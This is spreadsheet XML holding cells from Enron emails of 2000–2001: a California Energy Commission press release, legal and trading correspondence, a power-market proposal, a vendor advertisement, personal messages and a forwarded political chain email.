  <si>
    <t xml:space="preserve">The following News Release is now online:_x000D_
_x000D_
http://www.energy.ca.gov/releases/2001_releases/2001-12-28_tracy_peaker.html_x000D_
_x000D_
************************************************************************_x000D_
 For immediate release: December 28, 2001_x000D_
 Contact: Mary Ann Costamagna - 916 654-4989_x000D_
_x000D_
 California Energy Commission Releases_x000D_
 Tracy Peaker Project Staff Assessment_x000D_
_x000D_
  Sacramento - The California Energy Commission Staff Assessment of the_x000D_
  Tracy Peaker Project is now available for review. The Staff Assessment_x000D_
  - outlining the conditions that should apply to the design,_x000D_
  construction, operation, and closure of the project, should the_x000D_
  Commission grant a license - can be found online at:_x000D_
_x000D_
            www.energy.ca.gov/sitingcases/tracypeaker/documents/_x000D_
_x000D_
  The Staff Assessment is not a Commission decision or a proposed_x000D_
  decision on the Tracy Peaker Project. It is a staff document, analyzing_x000D_
  the project based on a thorough and independent review of the proposal_x000D_
  in accordance with the Public Resources Code and California_x000D_
  Environmental Quality Act._x000D_
_x000D_
  The staff has requested more information in the area of biological_x000D_
  resources to complete its review. An addendum to the Staff Assessment_x000D_
  analyzing the requested information and including the staff's_x000D_
  recommendation on the project will be published after the January_x000D_
  workshop detailed on page two._x000D_
_x000D_
  GWF Energy LLC is requesting approval to construct and operate the_x000D_
  Tracy Peaker Project. The proposed location for the 169-megawatt,_x000D_
  simple-cycle generation facility is a nine-acre, fenced site within a_x000D_
  40-acre parcel in unincorporated San Joaquin County. The property is_x000D_
  located six-tenths of a mile southeast of the Tracy Biomass plant and_x000D_
  is bounded by the Delta-Mendota Canal to the southwest and the Union_x000D_
  Pacific Railroad to the north._x000D_
_x000D_
  The Commission will hold Staff Assessment Workshops as follows:_x000D_
_x000D_
        When:     Wednesday, January 9, 2002_x000D_
                         5 p.m. - To last no later than 10 p.m._x000D_
_x000D_
                         Thursday, January 10, 2002_x000D_
                         5 p.m. - To last no later than 10 p.m._x000D_
_x000D_
        Where:    Holiday Inn Express Hotel &amp; Suites_x000D_
                         3751 Tracy Boulevard_x000D_
                         Tracy, California_x000D_
                        (Wheelchair accessible)_x000D_
_x000D_
  The purpose of these open and publicly noticed workshops is to allow_x000D_
  members of the public to participate in the power plant certification_x000D_
  process. To find out how to get involved, contact the Energy_x000D_
  Commission's Public Adviser, Roberta Mendonca, at (916) 654-4489, toll_x000D_
  free at (800) 822-6228 or by e-mail at [pao@energy.state.ca.us]._x000D_
_x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
If you would like to unsubscribe from this_x000D_
list.  Please use our form located at:_x000D_
_x000D_
http://www.energy.ca.gov/html/listservers.html_x000D_
_x000D_
Nancy Hassman_x000D_
California Energy Commission_x000D_
Web Team_x000D_
_x000D_
* * * * * * * * * *  * * * * * * * * * *   * * * * * * * * * * </t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 01:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'samantha.boyd@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>EDIDE - ADR</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
Susan D. Flynn_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB3806_x000D_
Houston, Texas  77002_x000D_
Phone:  713-853-0975_x000D_
Fax:  713-646-3490_x000D_
----- Forwarded by Susan Flynn/HOU/ECT on 07/05/2000 08:28 AM -----_x000D_
_x000D_
	Florencia Groppo &lt;florencia.groppo@hds.com.ar&gt;_x000D_
	07/03/2000 08:06 PM_x000D_
	Please respond to "florencia.groppo@hds.com.ar"_x000D_
		 _x000D_
		 To: "'Nancy Muchmore'" &lt;nancy.muchmore@enron.com&gt;_x000D_
		 cc: "'Susan Flynn'" &lt;Susan.Flynn@enron.com&gt;_x000D_
		 Subject: EDIDE - ADR_x000D_
_x000D_
_x000D_
Dear Nancy,_x000D_
 In connection with the mail I sent you on June 24, I need to know in what_x000D_
status is the deposit  of the ADRs in the account of EDIDE and the_x000D_
conversion into TGS shares._x000D_
 Best regards._x000D_
 Florencia Groppo</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 08:53:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.mara@enron.com', 'd..steffes@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Rick:_x000D_
Based on your voicemail, here's a quick-and-dirty synopsis of a proposal that I've been quietly discussing with a select few out here in California (e.g., John White, large customers).  It could include more bells and whistles, but the intent of this proposal is to get DA back as soon as possible._x000D_
**************************************************************************_x000D_
_x000D_
Reduce DWR L-T contract volumes by at least 33-50%_x000D_
To "back fill" increase in net-short created by contract reformation, permit noncore customers (20 KW and above) to elect to go DA to fill the position_x000D_
DA provides a significantly more efficient hedge against price volatility than DWR contracts_x000D_
Election is first-come, first-serve, capped at the aggregate net short position_x000D_
Customers decision to go DA will constitute a 3-year commitment to stay DA (i.e., can't go back to IOU for 3 yrs; must stay in the market)_x000D_
If a net short position remains after noncore customers have elected DA (i.e., not enough elect to fill the net short), then the IOUs will hold an auction to fill the net short_x000D_
The auction would seek a portfolio of 3 month, 6 month, 1 year and 3 year deals (both peak and off-peak) to fill the net short._x000D_
Noncore customers choosing DA would not escape costs of DWR power consumed when the customer was receiving utility service (i.e., prior to electing DA)_x000D_
Likewise, if the noncore customers choosing DA was a utility customer during the period when the utility accured its "undercollection," (i.e., when wholesale prices exceeded the retail cap), the customer would not escape those costs by virtue of electing DA status_x000D_
Noncore customers would not bear responsibility for recovery of DWR L-T contracts._x000D_
Potential add-on to deal:  Core customers (less than 20 KW) could choose "green only" DA, but, like, noncore customers could not escape costs for which they are responsible.</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 04:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stuart.zisman@enron.com', 'scott.sefton@enron.com', 'julia.chin@enron.com', 'sara.shackleton@enron.com', 'julia.murray@enron.com', 'mark.taylor@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>Bonus Resource Common:  FYI</t>
  </si>
  <si>
    <t>_x000D_
FYI--Bonus was a public which was already submitted to Chin._x000D_
_x000D_
Julia C., please note and act accordingly re execution etc.  Mary_x000D_
Mary_x000D_
_x000D_
_x000D_
Enron North America Corp._x000D_
Mary Cook_x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas   77002-7361_x000D_
(713) 345-7732 (phone)_x000D_
(713) 646-3490 (fax)_x000D_
mary.cook@enron.com_x000D_
----- Forwarded by Mary Cook/HOU/ECT on 09/12/2000 11:16 AM -----_x000D_
_x000D_
	Brad Carey@ENRON_x000D_
	09/12/2000 10:24 AM_x000D_
		 _x000D_
		 To: Mary Cook/HOU/ECT@ECT_x000D_
		 cc: Andrea V Reed/HOU/ECT@ECT, Michael S Galvan/HOU/ECT@ECT, Hope _x000D_
Vargas/HOU/ECT@ECT_x000D_
		 Subject: Bonus Resource Common_x000D_
_x000D_
Mary,_x000D_
_x000D_
Bonus Resources Common has been taken out of Raptor I.  I am not sure who _x000D_
else in legal would need to be notified.  If you could pass along this _x000D_
information I would appreciate it.  I will have a clerk send you a complete _x000D_
set of documents when we have finalized the notional value of Raptor I this _x000D_
afternoon._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
Brad Carey</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 23:28:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: erin pics</t>
  </si>
  <si>
    <t>Hey there,_x000D_
Thanks for the pics.  What a cutie.  I like the first pic a lot._x000D_
I'll IM ya later on this week.  Today I started my first day at the _x000D_
Woodlands bakery.  I was up at 4am and literally rolling dough by 5:10.  _x000D_
Later today I had 2 fillings done and my dentist accidentally anesthisized _x000D_
the wrong side of my mouth...TWICE...bc we got to talking about baking and _x000D_
the first round of shots wore off....then after the second round he realized _x000D_
that he was working on the wrong side.  Not good!  You should tell this to _x000D_
Phillip.  We have the same dentist.  It was actually not too bad but I'm _x000D_
super groggy._x000D_
Hope all is well at work.  I can't believe the stock price.  I almost fell _x000D_
over today when I saw it.  Unbelievable._x000D_
Take care and I'll talk to you soon._x000D_
Mo._x000D_
_x000D_
_x000D_
_x000D_
&gt;From: "Kuykendall, Tori" &lt;Tori.Kuykendall@ENRON.com&gt;_x000D_
&gt;To: "andrew" &lt;andrewhescock@hotmail.com&gt;,   "Cathy Morse" _x000D_
&gt;&lt;Cathy_morse@foleys.com&gt;, "haylee" &lt;hshaver@utilicorp.com&gt;,   "john perdew" _x000D_
&gt;&lt;jperdew@apbenergy.com&gt;, "monique" &lt;moshuffle@hotmail.com&gt;,   "robert _x000D_
&gt;hawkins" &lt;robert.hawkins@ci.austin.tx.us&gt;,   "scotty" _x000D_
&gt;&lt;scottymorales@home.com&gt;, "tomandjess" &lt;tnoble@officedepot.com&gt;_x000D_
&gt;Subject: FW: erin pics_x000D_
&gt;Date: Mon, 22 Oct 2001 07:56:13 -0500_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Patrick Kuykendall [mailto:patrick_kuykendall@hotmail.com]_x000D_
&gt;Sent: Sunday, October 21, 2001 8:59 PM_x000D_
&gt;To: Kuykendall, Tori_x000D_
&gt;Subject: erin pics_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;updated pics of erin for your enjoyment_x000D_
&gt;_x000D_
&gt;__________________________________________________________________x000D_
&gt;Get your FREE download of MSN Explorer at_x000D_
&gt;http://explorer.msn.com/intl.asp_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;**********************************************************************_x000D_
&gt;This e-mail is the property of Enron Corp. and/or its relevant affiliate _x000D_
&gt;and may contain confidential and privileged material for the sole use of _x000D_
&gt;the intended recipient (s). Any review, use, distribution or disclosure by _x000D_
&gt;others is strictly prohibited. If you are not the intended recipient (or _x000D_
&gt;authorized to receive for the recipient), please contact the sender or _x000D_
&gt;reply to Enron Corp. at enron.messaging.administration@enron.com and delete _x000D_
&gt;all copies of the message. This e-mail (and any attachments hereto) are not _x000D_
&gt;intended to be an offer (or an acceptance) and do not create or evidence a _x000D_
&gt;binding and enforceable contract between Enron Corp. (or any of its _x000D_
&gt;affiliates) and the intended recipient or any other party, and may not be _x000D_
&gt;relied on by anyone as the basis of a contract by estoppel or otherwise. _x000D_
&gt;Thank you._x000D_
&gt;**********************************************************************_x000D_
&gt;&lt;&lt; erinandbear.jpg &gt;&gt;_x000D_
&gt;&lt;&lt; erin3month.jpg &gt;&gt;_x000D_
&gt;&lt;&lt; erinreading.jpg &gt;&gt;_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 13:28:40 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Q and As</t>
  </si>
  <si>
    <t xml:space="preserve">	Bob Williams has agreed to chase the anti-trust notice._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Walls Jr., Rob  _x000D_
Sent:	Wednesday, November 07, 2001 2:25 PM_x000D_
To:	Haedicke, Mark E._x000D_
Cc:	Kimberly, Kelly; Kean, Steven J._x000D_
Subject:	FW: Q and As_x000D_
_x000D_
Mark -_x000D_
_x000D_
I understand you may get a call from Steve Kean about these Q and As.  I've sent copies to Tim Detmering (to get comments on the business side) and to Lance, Scott Wulfe, Joe Dilg, Shelley Barber and John Ale on the legal side (and several others).  I've also asked VE to prepare something for us to send to our employees that addresses what we can and can't say or do in terms of sharing information with Rockne (from an anti-trust and confidentiality standpoint).  It would be great if Richard Sanders or Bob Williams could help on this._x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
Thanks._x000D_
_x000D_
Rob  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kimberly, Kelly  _x000D_
Sent:	Wednesday, November 07, 2001 11:31 AM_x000D_
To:	Denne, Karen; Walls Jr., Rob_x000D_
Cc:	Hicks, Debra_x000D_
Subject:	Q and As_x000D_
_x000D_
Robbie--thanks for helping us vet these through the legal team.  Everything else hinges on these Q and As, so the sooner you can get them to look at it the better.  THANKS!_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 10:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Draft - Offsite in April 4-9.ppt</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Sally Beck/HOU/ECT on 04/09/2001 05:09 =_x000D_
PM=20_x000D_
---------------------------_x000D_
From: Fred Philipson/ENRON@enronXgate on 04/09/2001 04:46 PM_x000D_
To: Sally Beck/HOU/ECT@ECT, Beth Apollo/ENRON@enronXgate, Rahil=20_x000D_
Jafry/ENRON@enronXgate, James Scribner/Corp/Enron@Enron, Bob M=20_x000D_
Hall/NA/Enron@Enron, Robert Superty/HOU/ECT@ECT, Leslie Reeves/HOU/ECT@ECT_x000D_
cc: =20_x000D_
Subject: Draft  - Offsite in April 4-9.ppt_x000D_
_x000D_
_x000D_
Here=01,s the latest.  Recent efforts have focused on clarifying the =01&amp;wh=_x000D_
o, what,=20_x000D_
how, when, why and where=01,s=018 of the project.  Please direct your feedb=_x000D_
ack to=20_x000D_
me._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fred_x000D_
5-9323_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 09:26:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: TheStreet: Trusts Keeping Enron Off Balance</t>
  </si>
  <si>
    <t xml:space="preserve">i went to grab some pizza, ate and then passed out.  those shot i did with those girls wolly knew put me over the edge.  sorry about taking off like that.  i had a good time, but i ran out of energy quick._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Landry, Chad  _x000D_
Sent:	Monday, October 22, 2001 11:16 AM_x000D_
To:	Lenhart, Matthew_x000D_
Subject:	RE: TheStreet: Trusts Keeping Enron Off Balance_x000D_
_x000D_
what happened to you at CAT"S?  we could not find you._x000D_
_x000D_
CKL_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lenhart, Matthew  _x000D_
Sent:	Monday, October 22, 2001 10:59 AM_x000D_
To:	Landry, Chad_x000D_
Subject:	RE: TheStreet: Trusts Keeping Enron Off Balance_x000D_
_x000D_
this is unbelievable.  seems like the worst is yet to come.  if they have to end up issuing more stock this thing can go to $10._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Landry, Chad  _x000D_
Sent:	Monday, October 22, 2001 10:27 AM_x000D_
To:	Lenhart, Matthew; Bass, Eric; Plauche, Stephen_x000D_
Subject:	FW: TheStreet: Trusts Keeping Enron Off Balance_x000D_
_x000D_
hey plauch, still think it is impossible for this stock to take on a one-handle.  just read below._x000D_
_x000D_
ckl_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kiani-Aslani, John  _x000D_
Sent:	Monday, October 22, 2001 8:33 AM_x000D_
To:	Gonzalez, Andrea_x000D_
Subject:	TheStreet: Trusts Keeping Enron Off Balance_x000D_
_x000D_
_x000D_
 &lt;&lt; File: Trusts Keeping Enron Off Balance.htm &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 05:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Summer Documents</t>
  </si>
  <si>
    <t xml:space="preserve">John,_x000D_
_x000D_
As per Steve Kean's request, please find attached the documents that I _x000D_
currently have on my system.  Hal Means and I are working together to manage _x000D_
the flow of documents and to ensure everyone on the Project Teams is on the _x000D_
same page.  Therefore, Hal will cross-reference with my documents and send _x000D_
you the documents that you are missing._x000D_
_x000D_
Please let Hal and me know if you would like a master binder created (it will _x000D_
be exactly like the binder that the Project Team currently has).  This would _x000D_
ensure that your tabs, and documents within the tabs, would exactly mirror _x000D_
the project team's binders.  If so, in the future we will send you additional _x000D_
documents indicating which tab it should be inserted after._x000D_
_x000D_
Note to Hal Means: Please cross-reference with the attached documents and _x000D_
forward any that are not included in this email._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 10:23:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeffb@tpt.com'})</t>
  </si>
  <si>
    <t>Trading in ERCOT</t>
  </si>
  <si>
    <t>&lt;HTML&gt;_x000D_
&lt;head&gt;_x000D_
&lt;title&gt;Power XL&lt;/title&gt;_x000D_
&lt;/head&gt;_x000D_
&lt;body&gt;_x000D_
&lt;p align="left"&gt;_x000D_
&lt;font face="Arial" size="2"&gt;We've got a new product that you might be interested _x000D_
in.&amp;nbsp; It's a next-generation POWER TRADING system -- and it utilizes&amp;nbsp;the _x000D_
most advanced technology available today to deliver extremely fast processing _x000D_
for large, complex portfolios.&amp;nbsp; Power XL is used by power and gas traders _x000D_
to manage down-to-the-hour positions and P/L -- in real-time without the need _x000D_
to run batch processes or reports.&amp;nbsp; Slice and dice positions and trading _x000D_
results, in real-time on your desktop.&lt;br&gt;_x000D_
&lt;br&gt;_x000D_
Whether or not you are happy with your current system -- we'd like you to take _x000D_
a look at Power XL.&amp;nbsp; No obligation, no expectations.&amp;nbsp; Just tell us _x000D_
when and where.&lt;br&gt;_x000D_
&lt;br&gt;_x000D_
For more information, visit &lt;a href="http://www.tpt.com/pxl/defaultpxl.asp"&gt;http://www.tpt.com/pxl&lt;/a&gt; _x000D_
or call me to schedule a demonstration.&lt;br&gt;_x000D_
&lt;br&gt;_x000D_
Jeff Belanger&lt;br&gt;_x000D_
&lt;a href="mailto:jeffb@tpt.com"&gt;jeffb@tpt.com&lt;/a&gt;&lt;br&gt;_x000D_
Triple Point Technology, Inc.&lt;br&gt;_x000D_
+1.203.291.7979&lt;br&gt;_x000D_
&lt;br&gt;_x000D_
&lt;br&gt;_x000D_
&lt;br&gt;_x000D_
&lt;/a&gt;&lt;img border="0" src="http://www.tpt.com/newsletter/pxl_nov_01/111901.gif" _x000D_
width="2" height="2"&gt;_x000D_
&lt;/font&gt;_x000D_
&lt;/p&gt;_x000D_
&lt;/body&gt;_x000D_
&lt;/HTML&gt;</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 06:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 2/10/01 Checkout</t>
  </si>
  <si>
    <t xml:space="preserve">Diana says it's definitely on peak hours. Let me know...._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
02/12/2001 02:28 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 2/10/01 Checkout_x000D_
_x000D_
 _x000D_
_x000D_
Dianna Scholtes_x000D_
deal 519755_x000D_
Bloomberg shows hours as offpeak..._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Jun 2000 08:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: July 2000 First of the month availabilities</t>
  </si>
  <si>
    <t>Beverly, _x000D_
_x000D_
Please include Carlos Rodriguez on the CES e-mails.  He will be handleing the _x000D_
scheduling for us.  Thanks._x000D_
_x000D_
D</t>
  </si>
  <si>
    <t>Thu, 18 Jan 2001 05:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PanEnergy Swap</t>
  </si>
  <si>
    <t xml:space="preserve">The PanEnergy spreadsheet is attached._x000D_
_x000D_
D_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 02:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'paul.choi@enron.com', 'miguel.garcia@enron.com', 'rogers.herndon@enron.com', 'janice.moore@enron.com', 'kimberly.allen@enron.com', 'diana.allen@enron.com', 'alton.jackson@enron.com', 'chad.starnes@enron.com', 'genia.fitzgerald@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'rhonda.robinson@enron.com', 'dean.laurent@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'cyril.price@enron.com', 'amy.horton@enron.com', 'anna.santucci@enron.com', 'michael.driscoll@enron.com', 'laura.jones@enron.com', 'kyle.schultz@enron.com', 'joe.quenet@enron.com', 'jan.king@enron.com', 'cara.semperger@enron.com', 'john.malowney@enron.com', 'debbie.brackett@enron.com', 'russell.kelley@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'george.hopley@enron.com', 'paul.mead@enron.com', 'stephanie.piwetz@enron.com', 'joe.errigo@enron.com', 'joseph.wagner@enron.com', 'robert.benson@enron.com', 'kimberly.hundl@enron.com', 'paul.thomas@enron.com', 'd.hunsucker@enron.com', 'jeff.king@enron.com', 'justin.laverell@enron.com', 'william.bradford@enron.com', 'stewart.rosman@enron.com', 'jesse.bryson@enron.com', 'karla.compean@enron.com', 'edward.baughman@enron.com', 'sharen.cason@enron.com', 'jason.crawford@enron.com', 'tanya.rohauer@enron.com', 'ricardo.perez@enron.com', 'eric.saibi@enron.com', 'kim.theriot@enron.com', 'doug.gilbert-smith@enron.com', 'russell.diamond@enron.com', 'michael.kelly@enron.com', 'michael.etringer@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'janet.moore@enron.com', 'dan.houston@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'joseph.piotrowski@enron.com', 'james.terrell@enron.com', 'bill.rust@enron.com', 'fran.chang@enron.com', 'greg.trefz@enron.com', 'john.suttle@enron.com', 'veronica.gonzalez@enron.com', 'john.forney@enron.com', 'chris.foster@enron.com', 'stanley.cocke@enron.com', 'larry.jester@enron.com', 'clint.dean@enron.com', 'david.ryan@enron.com', 'sean.crandall@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'david.portz@enron.com', 'karen.lambert@enron.com', 'erik.serio@enron.com', 'kevin.presto@enron.com', 'leslie.hansen@enron.com', 'kim.ward@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'john.suarez@enron.com', 'corry.bentley@enron.com', 'jeffrey.hodge@enron.com', 'andy.pace@enron.com', 'rika.imai@enron.com', 'christopher.watts@enron.com', 'rod.nelson@enron.com', 'kevin.cline@enron.com', 'lawrence.clayton@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'ted.ballinger@enron.com', 'thresa.allen@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'jason.choate@enron.com', 'elsie.lew@enron.com', 'gary.justice@enron.com', 'larry.campbell@enron.com', 'todd.decook@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'kim.durham@enron.com', 'jay.wills@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'brent.hebert@enron.com', 'christopher.smith@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'george.wood@enron.com', 'grace.kim@enron.com', 'dave.mangskau@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@enron.com', 'mary.hain@enron.com', 'brant.reves@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'zachary.sampson@enron.com', 'lloyd.will@enron.com', 'gretchen.lotz@enron.com', 'elizabeth.sager@enron.com', 'larry.valderrama@enron.com', 'edward.sacks@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'holli.krebs@enron.com', 'posey.martinez@enron.com', 'mike.swerzbin@enron.com', 'tom.dutta@enron.com', 'wayne.herndon@enron.com', 'peter.makkai@enron.com', 'shari.stack@enron.com', 'alan.chen@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'carla.hoffman@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>Southern California Edison Company</t>
  </si>
  <si>
    <t>We have received the executed Master Power Purchase and Sale Agreement dated _x000D_
11/14/2000 from the referenced CP.  Copies will be given to Legal and Credit._x000D_
_x000D_
THIS IS AN EDISON ELECTRIC INSTITUTE (EEI) AGREEMENT.</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 03:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dlove8847@aol.com', 'jimmy.simien@enron.com', 'james.love@msl.redstone.army.mil', 'alove770@cs.com'})</t>
  </si>
  <si>
    <t>FW: WORTH SHARING</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 10/17/2000 _x000D_
10:25 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Darron C Giron                           10/17/2000 10:13 AM_x000D_
	_x000D_
_x000D_
To: kristi.giron@cfisd.net, hollyw@email.msn.com, Phillip M Love/HOU/ECT@ECT, _x000D_
Dawn C Kenne/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: WORTH SHARING_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Darron C Giron/HOU/ECT on 10/17/2000 _x000D_
10:12 AM ---------------------------_x000D_
_x000D_
_x000D_
Greg Couch_x000D_
10/17/2000 10:04 AM_x000D_
To: Darron C Giron/HOU/ECT@ECT, bbernard@hypercon.com, _x000D_
mafullerton@westernhubs.com, lbkudu@gateway.net_x000D_
cc:  _x000D_
Subject: FW: WORTH SHARING_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Greg Couch/HOU/ECT on 10/17/2000 10:03 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Clark, Mike" &lt;mclark@ARC-AG.COM&gt; on 10/17/2000 07:24:27 AM_x000D_
To: "Berg, Cindy" &lt;cberg@ARC-AG.COM&gt;, "Miller, David" &lt;dmiller@ARC-AG.COM&gt;, _x000D_
"Clark, Graydon" &lt;gclark@arc-ag.com&gt;, "'Greg Couch-Enron'" &lt;gcouch@enron.com&gt;_x000D_
cc:  _x000D_
Subject: FW: WORTH SHARING_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: May, Dallas_x000D_
Sent: Tuesday, October 17, 2000 7:11 AM_x000D_
To: Clark, Mike; Graham, Annette; Kirksey, Andy; 'Wayne M.';_x000D_
'Tammy-Home'; 'rcamp'; 'Marlena'; 'Dean P.'; 'Dawn'_x000D_
Subject: FW: WORTH SHARING_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Bill Wallace [mailto:wallace@NSTEXAS.COM]_x000D_
Sent: Tuesday, October 17, 2000 6:40 AM_x000D_
To: Dallas May (E-mail); Brian Crawford (E-mail); Jay Yeaman (E-mail);_x000D_
J. D. Hancock (E-mail); George Cudworth (E-mail); Rob Hayes (E-mail)_x000D_
Subject: WORTH SHARING_x000D_
_x000D_
_x000D_
This one is worth sharing...Guess which global superpower these_x000D_
&gt;statistics are from:_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;709,000 regular (active duty) service personnel_x000D_
&gt;_x000D_
&gt;293,000 reserve troops_x000D_
&gt;_x000D_
&gt;Eight standing Army divisions_x000D_
&gt;_x000D_
&gt;20 Air Force and Navy air wings with 2,000 combat aircraft_x000D_
&gt;_x000D_
&gt;232 strategic bombers_x000D_
&gt;_x000D_
&gt;13 strategic ballistic missile submarines with 3,114 nuclear warheads on_x000D_
&gt;232 missiles_x000D_
&gt;_x000D_
&gt;500 ICBMs with 1,950 warheads_x000D_
&gt;_x000D_
&gt;Four aircraft carriers and all the support bases, shipyards and logistical_x000D_
&gt;assets needed to sustain such a force_x000D_
&gt;_x000D_
&gt;Is this country Russia? . . . No_x000D_
&gt;_x000D_
&gt;Red China? . . . No_x000D_
&gt;_x000D_
&gt;Great Britain? . . . Wrong Again_x000D_
&gt;_x000D_
&gt;USA? . . . Hardly_x000D_
&gt;_x000D_
&gt;Give up??_x000D_
&gt;_x000D_
&gt;Well, don't feel too bad if you are unable to identify this global_x000D_
&gt;superpower because this country no longer exists. It has vanished. These_x000D_
are_x000D_
&gt;the American military forces that have disappeared since the 1992 election_x000D_
&gt;of Bill Clinton and Al Gore._x000D_
&gt;_x000D_
&gt;Sleep well, America. It's time to vote!_x000D_
_x000D_
_x000D_
 - C.DTF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 10:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EOL approvals, 04-10-01</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 04/10/2001 05:24 PM -----_x000D_
_x000D_
	Walter Guidroz/ENRON@enronXgate_x000D_
	04/10/2001 05:20 PM_x000D_
		 _x000D_
		 To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/ENRON@enronXgate, _x000D_
Debbie R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli _x000D_
Campbell/ENRON@enronXgate, Cynthia Clark/ENRON@enronXgate, Enron Europe _x000D_
Global CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tom _x000D_
